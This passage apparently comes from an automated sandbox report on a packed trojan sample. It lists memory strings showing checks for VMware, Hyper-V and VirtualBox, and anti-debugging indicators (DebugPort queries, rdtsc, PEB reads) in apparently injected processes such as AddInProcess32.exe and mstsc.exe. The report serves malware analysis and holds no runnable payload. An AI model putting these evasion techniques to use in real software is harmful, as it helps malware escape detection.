          Source: explorer.exe, 00000010.00000003.900881622.000000000F25D000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B<
          Source: explorer.exe, 00000010.00000003.902621050.000000000F492000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllA
          Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000002.686708823.0000000004B70000.00000002.00000001.sdmp, explorer.exe, 00000002.00000002.764657677.00000000058C0000.00000002.00000001.sdmp, WerFault.exe, 0000000A.00000002.765137858.000001EDC74E0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: explorer.exe, 00000010.00000003.905324815.000000000EEB2000.00000004.00000001.sdmpBinary or memory string: }#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B
          Source: SearchUI.exe, 00000016.00000003.854498121.000001B8E47E8000.00000004.00000001.sdmpBinary or memory string: vmware horizon client
          Source: SearchUI.exe, 00000016.00000003.843512340.000001B8E45F7000.00000004.00000001.sdmpBinary or memory string: *|hyper-v manager*|hyper v4225
          Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000002.687067868.0000000005620000.00000004.00000001.sdmpBinary or memory string: vmware svga
          Source: explorer.exe, 00000010.00000003.902544793.00000000063F7000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B5b
          Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000002.686708823.0000000004B70000.00000002.00000001.sdmp, explorer.exe, 00000002.00000002.764657677.00000000058C0000.00000002.00000001.sdmp, WerFault.exe, 0000000A.00000002.765137858.000001EDC74E0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000010.00000003.836052474.0000000006300000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}`
          Source: explorer.exe, 00000010.00000003.902602832.000000000F48D000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Bm
          Source: explorer.exe, 00000010.00000003.903702476.000000000EEB1000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B
          Source: explorer.exe, 00000010.00000003.836052474.0000000006300000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}`p.
          Source: SearchUI.exe, 00000016.00000003.854498121.000001B8E47E8000.00000004.00000001.sdmpBinary or memory string: vmware workstation 12 player
          Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000002.687067868.0000000005620000.00000004.00000001.sdmpBinary or memory string: vmware sata5vmware usb pointing device-vmware vmci bus deviceCvmware virtual s scsi disk device
          Source: explorer.exe, 00000010.00000003.901951610.0000000006454000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Be
          Source: SearchUI.exe, 00000016.00000003.841016944.000001B8E4466000.00000004.00000001.sdmpBinary or memory string: VMware.Horizon.Client9116
          Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000002.687067868.0000000005620000.00000004.00000001.sdmpBinary or memory string: virtual-vmware pointing device
          Source: SearchUI.exe, 00000016.00000003.841016944.000001B8E4466000.00000004.00000001.sdmpBinary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\VMware\Infrastructure\Virtual Infrastructure Client\Launcher\VpxClient.exe7674
          Source: explorer.exe, 00000010.00000003.836052474.0000000006300000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000!O
          Source: SearchUI.exe, 00000016.00000003.841016944.000001B8E4466000.00000004.00000001.sdmpBinary or memory string: VMware.Workstation.vmui7347
          Source: SearchUI.exe, 00000016.00000003.854498121.000001B8E47E8000.00000004.00000001.sdmpBinary or memory string: vmware vsphere clientator x
          Source: explorer.exe, 00000002.00000000.704041361.000000000A716000.00000004.00000001.sdmpBinary or memory string: _VMware_SATA_CD00#5&^
          Source: explorer.exe, 00000010.00000003.836052474.0000000006300000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: SearchUI.exe, 00000016.00000003.841016944.000001B8E4466000.00000004.00000001.sdmpBinary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\VMware\VMware Workstation\vmnetcfg.exe11073
          Source: SearchUI.exe, 00000016.00000003.854498121.000001B8E47E8000.00000004.00000001.sdmpBinary or memory string: vmware vsphere client
          Source: explorer.exe, 00000002.00000000.700277860.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: SearchUI.exe, 00000016.00000003.841016944.000001B8E4466000.00000004.00000001.sdmpBinary or memory string: VMware.Workstation.vmplayer7859
          Source: explorer.exe, 00000010.00000002.1046776940.000000000626D000.00000004.00000001.sdmpBinary or memory string: _VMware_SATA_CD00#5&
          Source: explorer.exe, 00000010.00000003.882389201.000000000F59B000.00000004.00000001.sdmpBinary or memory string: 9Tm\Device\HarddiskVolume2\??\Volume{ef47ea26-ec76-4a6e-8680-9e53b539546d}\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\DosDevices\D:
          Source: explorer.exe, 00000010.00000002.1047169993.000000000637F000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD004rFw
          Source: SearchUI.exe, 00000016.00000002.899122155.000001B0CF010000.00000004.00000001.sdmpBinary or memory string: *|hyper-v manager*|hyperv3631
          Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000002.687067868.0000000005620000.00000004.00000001.sdmpBinary or memory string: vboxservicevbox)Microsoft Virtual PC
          Source: SearchUI.exe, 00000016.00000003.843512340.000001B8E45F7000.00000004.00000001.sdmpBinary or memory string: nh*|cmd112220*|disk cleanup*|cleanmgr.exe77726*|excel 2013*|microsoft office7310App12227*|default programs*|defult598712233*|defragment and optimize drives*|degrag6248*|file explorer*|window explorer70312378*|geforce experience*|shadowplay56352391*|geforce experience*|gforce652112409*|geforce experience*|nivi6501bwe!App12348*|get started*|windows 10 help3344*|google cloud sdk shell*|cmd1*|google drive*|googledrive6212App12414*|groove music*|open music71364!App12331*|groove music*|play music4514e12415*|hi-rez diagnostics and support*|hi rez2380*|file explorer*|where are my files6187*|file explorer*|windows explorer3803*|geforce experience*|nvide6593p12374*|get started*|windows help3912a!App12368*|hp aio printer remote*|hp printer273812342*|get started*|windows 10 tutorial451012372*|file explorer*|open file explorer710477*|geforce experience*|nvidia ge617112332*|geforce experience*|nvida644587*|global vpn client*|sonicwall423112398*|football manager 2015*|fm964App12322*|games for windows marketplace*|gfwl3576*|google earth*|googleearth640712395*|google play music*|google music2700e12346*|groove music*|play my music5618*|hi-rez diagnostics and support*|hirez1973*|geforce experience*|nvidia ex642612355*|file explorer*|file manager542312375*|groove music*|free music6921!App12337*|groove music*|xbox music67613*|free download manager*|fdm1938el12405*|geforce experience*|gefore5441p12329*|internet explorer*|explorer 11977912490*|intel(r) extreme tuning utility*|xtu1622*|internet explorer*|microsoft explorer8574*|internet download accelerator*|ida356*|internet explorer*|internet exploerer9667*|hyper-v manager*|hyper v4225e12505*|i.r.i.s. ocr registration*|iris12651*|idle (python gui)*|python idle4801*|image composite editor*|ice215App12525*|idle (python 3.5 32-bit)*|python idle50580*|internet download manager*|id,6987p12467*|internet explorer*|internet expolorer10417*|internet explorer*|internet exploreer9110*|internet explorer*|enternet explorer9276*|hp support assistant*|hps4890App12509*|internet download manager*|idman6644*|internet explorer*|interent explorer10096*|hp support assistant*|hp ass4255pp12449*|internet explorer*|internet explorere7950*|internet explorer*|internetexplorer8330524*|internet explorer*|inernet explorer985438*|internet explorer*|internet exlorer10013*|internet explorer*|intenet explorer9908421*|internet explorer*|internet eplorer9958*|internet explorer*|iexplorer.exe9535*|internet explorer*|internet explorer 117905*|internet explorer*|internet exploror10409*|internet explorer*|internet exporer8991*|internet explorer*|iexplore.exe7898*|internet explorer*|web browser10137*|internet explorer*|internet exployer853455*|internet explorer*|internet browser10356Microsoft.WindowsScan_8wekyb3d8bbwe!AppMicrosoft.Windows.Photos_8wekyb3d8bbwe!AppMicrosoft.MinecraftUWP_8wekyb3d8bbwe!
          Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000002.686708823.0000000004B70000.00000002.00000001.sdmp, explorer.exe, 00000002.00000002.764657677.00000000058C0000.00000002.00000001.sdmp, WerFault.exe, 0000000A.00000002.765137858.000001EDC74E0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: SearchUI.exe, 00000016.00000003.841016944.000001B8E4466000.00000004.00000001.sdmpBinary or memory string: VMwareInc.VMwareViewClient_23chmsjxv380w!App11470
          Source: SearchUI.exe, 00000016.00000003.841016944.000001B8E4466000.00000004.00000001.sdmpBinary or memory string: VMware.View.Client10660
          Source: explorer.exe, 00000010.00000003.906450432.000000000EEB0000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}BE*
          Source: explorer.exe, 00000010.00000003.906450432.000000000EEB0000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}BZZ[
          Source: explorer.exe, 00000010.00000002.1046384297.0000000006136000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000010.00000003.782247022.0000000004CBD000.00000004.00000001.sdmpBinary or memory string: 0ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\mstsc.exeProcess queried: DebugPort
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_00409A90 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0040ACD0 LdrLoadDll,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012D4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012D4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012D4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012D4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012D4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012E513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012E513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012B9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012B9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012B9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012BC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012BB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012BB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012DB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012DB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013351BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013351BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013351BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013351BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012E61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012E61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012D99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012D99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012D99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012D99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012D99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012D99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012D99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012D99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012D99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012D99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012D99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012D99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013749A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013749A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013749A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013749A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013369A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012EA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012DC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012E2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012E4190 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012BB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012BB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012BB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013441E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012E002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012E002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012E002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012E002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012E002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012CB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012CB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012CB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012CB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012DA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012DA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012DA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012DA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01337016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01337016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01337016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01384015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01384015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01372073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01381074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012D0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012D0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012F90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012E20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012E20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012E20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012E20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012E20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012E20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012EF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012EF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012EF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012B9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01333884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01333884 mov eax, dword ptr fs:[00000030h]
